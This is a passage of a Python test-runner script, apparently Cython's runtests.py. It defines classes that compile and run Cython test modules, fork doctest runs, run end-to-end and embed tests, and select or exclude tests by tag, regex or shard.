self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in ('warning_errors', 'clear_to_none', 'error_on_unknown_names', 'error_on_uninitialized')
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file=os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
blacklist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in blacklist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None,
capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
commands = (self.commands
.replace("CYTHONIZE", "PYTHON %s" % os.path.join(self.cython_root, 'cythonize.py'))
.replace("CYTHON", "PYTHON %s" % os.path.join(self.cython_root, 'cython.py'))
.replace("PYTHON", sys.executable))
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + old_path
env['PYTHONPATH'] = new_path
cmd = []
out = []
err = []
for command_no, command in enumerate(filter(None, commands.splitlines()), 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if ' setup.py ' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=True,
env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command,
shell=True,
env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = 'cython.py'
if sys.version_info[0] >=3 and CY3_DIR:
cython = os.path.join(CY3_DIR, cython)
cython = os.path.abspath(os.path.join('..', '..', cython))
self.assertEqual(0, os.system(
"make PYTHON='%s' CYTHON='%s' LIBDIR1='%s' test > make.output" % (sys.executable, cython, libdir)))
try:
os.remove('make.output')
except OSError:
pass
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, mod in deps.items():
try:
__import__(mod)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = (testname in self.excludes
or testname.split('.')[-1] in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
# determanistic partition of the tests which is important.
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(testname) & 0x7fffffff if _is_py2 else _hash(testname.encode())
return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
